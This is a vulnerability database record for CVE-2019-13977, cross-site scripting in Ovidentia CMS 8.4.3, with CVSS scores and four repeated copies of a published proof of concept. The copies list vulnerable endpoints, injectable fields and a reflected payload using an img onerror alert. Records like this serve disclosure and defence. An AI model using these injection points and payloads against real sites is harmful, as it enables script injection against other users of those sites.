ID CVE-2019-13977Type cveReporter cve@mitre.orgModified 2019-07-27T17:15:00
Description
index.php in Ovidentia 8.4.3 has XSS via tg=groups, tg=maildoms&idx=create&userid=0&bgrp=y, tg=delegat, tg=site&idx=create, tg=site&item=4, tg=admdir&idx=mdb&id=1, tg=notes&idx=Create, tg=admfaqs&idx=Add, or tg=admoc&idx=addoc&item=.
{"id": "CVE-2019-13977", "bulletinFamily": "NVD", "title": "CVE-2019-13977", "description": "index.php in Ovidentia 8.4.3 has XSS via tg=groups, tg=maildoms&idx=create&userid=0&bgrp=y, tg=delegat, tg=site&idx=create, tg=site&item=4, tg=admdir&idx=mdb&id=1, tg=notes&idx=Create, tg=admfaqs&idx=Add, or tg=admoc&idx=addoc&item=.", "published": "2019-07-19T07:15:00", "modified": "2019-07-27T17:15:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13977", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/153737/Ovidentia-8.4.3-Cross-Site-Scripting.html", "https://github.com/Kitsun3Sec/exploits/blob/master/cms/ovidentia/exploitXSSOvidentia.txt"], "cvelist": ["CVE-2019-13977"], "type": "cve", "lastseen": "2020-10-03T13:38:42", "edition": 4, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:7E70DF83AC93F5019AB0E03437DA7DC7"]}, {"type": "zdt", "idList": ["1337DAY-ID-33023"]}, {"type": "exploitdb", "idList": ["EDB-ID:47159"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153737"]}], "modified": "2020-10-03T13:38:42", "rev": 2}, "score": {"value": 3.1, "vector": "NONE", "modified": "2020-10-03T13:38:42", "rev": 2}, "vulnersScore": 3.1}, "cpe": ["cpe:/a:ovidentia:ovidentia:8.4.3"], "affectedSoftware": [{"cpeName": "ovidentia:ovidentia", "name": "ovidentia", "operator": "eq", "version": "8.4.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:ovidentia:ovidentia:8.4.3:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ovidentia:ovidentia:8.4.3:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2019-12-04T07:43:11", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-07-25T00:00:00", "title": "Ovidentia 8.4.3 - Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-25T00:00:00", "id": "1337DAY-ID-33023", "href": "https://0day.today/exploit/description/33023", "sourceData": "#-------------------------------------------------------\r\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\r\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\r\n# CVE: [ CVE-2019-13977 ]\r\n# Exploit Author:\r\n# [ Fernando Pinheiro (n3k00n3) ]\r\n# [ Victor Flores\t(UserX) ]\r\n# Vendor Homepage: [\r\nhttps://www.ovidentia.org/\r\n]\r\n# Version: [ 8.4.3 ]\r\n# Tested on: [ Mac,linux - Firefox, safari ]\r\n# Download: [\r\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\r\n]\r\n#\r\n# [ Kitsun3Sec Research Group ]\r\n#--------------------------------------------------------\r\n\r\nPOC\r\n\r\n>========================================================\r\n Stored XSS\r\n>========================================================\r\n\r\n1. POST\r\nhttp://TARGET/ovidentia/index.php?tg=groups\r\nField:\r\n\t\tnom\r\n2. POST\r\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\r\nFields:\r\n\t\tNom\r\n\t\tDescription\r\n3. GET\r\nhttp://TARGET/ovidentia/index.php?tg=delegat\r\nShow groups\r\n4. POST\r\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\r\nFields:\r\n\t\tNom\r\n\t\taddress\r\n\t\tdescription\r\n5. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\r\nFields:\r\n\t\tLibell\u00e9 du champ\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\r\n6. POST\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\r\nFields: Notes\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\r\n7. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\r\nFields: all\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\r\n>========================================================\r\n REFLECTED\r\n>========================================================\r\n\r\n1. GET\r\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\r\n\r\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33023"}], "exploitdb": [{"lastseen": "2019-07-25T08:50:57", "description": "", "published": "2019-07-25T00:00:00", "type": "exploitdb", "title": "Ovidentia 8.4.3 - Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-25T00:00:00", "id": "EDB-ID:47159", "href": "https://www.exploit-db.com/exploits/47159", "sourceData": "#-------------------------------------------------------\r\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\r\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\r\n# Date: [ 06/05/2019 ]\r\n# CVE: [ CVE-2019-13977 ]\r\n# Exploit Author:\r\n# [ Fernando Pinheiro (n3k00n3) ]\r\n# [ Victor Flores\t(UserX) ]\r\n# Vendor Homepage: [\r\nhttps://www.ovidentia.org/\r\n]\r\n# Version: [ 8.4.3 ]\r\n# Tested on: [ Mac,linux - Firefox, safari ]\r\n# Download: [\r\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\r\n]\r\n#\r\n# [ Kitsun3Sec Research Group ]\r\n#--------------------------------------------------------\r\n\r\nPOC\r\n\r\n>========================================================\r\n Stored XSS\r\n>========================================================\r\n\r\n1. POST\r\nhttp://TARGET/ovidentia/index.php?tg=groups\r\nField:\r\n\t\tnom\r\n2. POST\r\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\r\nFields:\r\n\t\tNom\r\n\t\tDescription\r\n3. GET\r\nhttp://TARGET/ovidentia/index.php?tg=delegat\r\nShow groups\r\n4. POST\r\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\r\nFields:\r\n\t\tNom\r\n\t\taddress\r\n\t\tdescription\r\n5. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\r\nFields:\r\n\t\tLibell\u00e9 du champ\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\r\n6. POST\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\r\nFields: Notes\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\r\n7. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\r\nFields: all\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\r\n>========================================================\r\n REFLECTED\r\n>========================================================\r\n\r\n1. GET\r\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\r\n\r\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://www.exploit-db.com/download/47159"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nOvidentia 8.4.3 - Cross-Site Scripting", "edition": 1, "published": "2019-07-25T00:00:00", "title": "Ovidentia 8.4.3 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-25T00:00:00", "id": "EXPLOITPACK:7E70DF83AC93F5019AB0E03437DA7DC7", "href": "", "sourceData": "#-------------------------------------------------------\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\n# Date: [ 06/05/2019 ]\n# CVE: [ CVE-2019-13977 ]\n# Exploit Author:\n# [ Fernando Pinheiro (n3k00n3) ]\n# [ Victor Flores\t(UserX) ]\n# Vendor Homepage: [\nhttps://www.ovidentia.org/\n]\n# Version: [ 8.4.3 ]\n# Tested on: [ Mac,linux - Firefox, safari ]\n# Download: [\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\n]\n#\n# [ Kitsun3Sec Research Group ]\n#--------------------------------------------------------\n\nPOC\n\n>========================================================\n Stored XSS\n>========================================================\n\n1. POST\nhttp://TARGET/ovidentia/index.php?tg=groups\nField:\n\t\tnom\n2. POST\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\nFields:\n\t\tNom\n\t\tDescription\n3. GET\nhttp://TARGET/ovidentia/index.php?tg=delegat\nShow groups\n4. POST\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\n\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\nFields:\n\t\tNom\n\t\taddress\n\t\tdescription\n5. POST\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\nFields:\n\t\tLibell\u00e9 du champ\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\n\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\n\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\n6. POST\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\nFields: Notes\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\n7. POST\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\nFields: all\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\n>========================================================\n REFLECTED\n>========================================================\n\n1. GET\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\n\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-07-27T21:05:36", "description": "", "published": "2019-07-24T00:00:00", "type": "packetstorm", "title": "Ovidentia 8.4.3 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-24T00:00:00", "id": "PACKETSTORM:153737", "href": "https://packetstormsecurity.com/files/153737/Ovidentia-8.4.3-Cross-Site-Scripting.html", "sourceData": "`#------------------------------------------------------- \n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ] \n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ] \n# Date: [ 06/05/2019 ] \n# CVE: [ CVE-2019-13977 ] \n# Exploit Author: \n# [ Fernando Pinheiro (n3k00n3) ] \n# [ Victor Flores (UserX) ] \n# Vendor Homepage: [ \nhttps://www.ovidentia.org/ \n] \n# Version: [ 8.4.3 ] \n# Tested on: [ Mac,linux - Firefox, safari ] \n# Download: [ \nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 \n] \n# \n# [ Kitsun3Sec Research Group ] \n#-------------------------------------------------------- \n \nPOC \n \n>======================================================== \nStored XSS \n>======================================================== \n \n1. POST \nhttp://TARGET/ovidentia/index.php?tg=groups \nField: \nnom \n2. POST \nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y \nFields: \nNom \nDescription \n3. GET \nhttp://TARGET/ovidentia/index.php?tg=delegat \nShow groups \n4. POST \nhttp://TARGET/ovidentia/index.php?tg=site&idx=create \n \nhttp://TARGET/ovidentia/index.php?tg=site&item=4 \nFields: \nNom \naddress \ndescription \n5. POST \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1 \nFields: \nLibell\u00e9 du champ \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices \n \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1 \n \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1 \n6. POST \nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create \nFields: Notes \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List \n7. POST \nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add \nFields: all \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2 \n>======================================================== \nREFLECTED \n>======================================================== \n \n1. GET \nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E \n \nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland. \n`\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/153737/ovidentia843-xss.txt"}]}
